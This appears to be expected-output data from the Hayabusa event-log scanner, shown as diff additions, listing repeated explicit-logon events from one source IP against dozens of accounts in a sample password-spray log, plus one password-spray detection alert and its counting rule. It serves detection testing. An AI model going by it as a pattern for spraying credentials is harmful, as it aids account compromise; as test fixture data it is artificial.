+2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
+2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
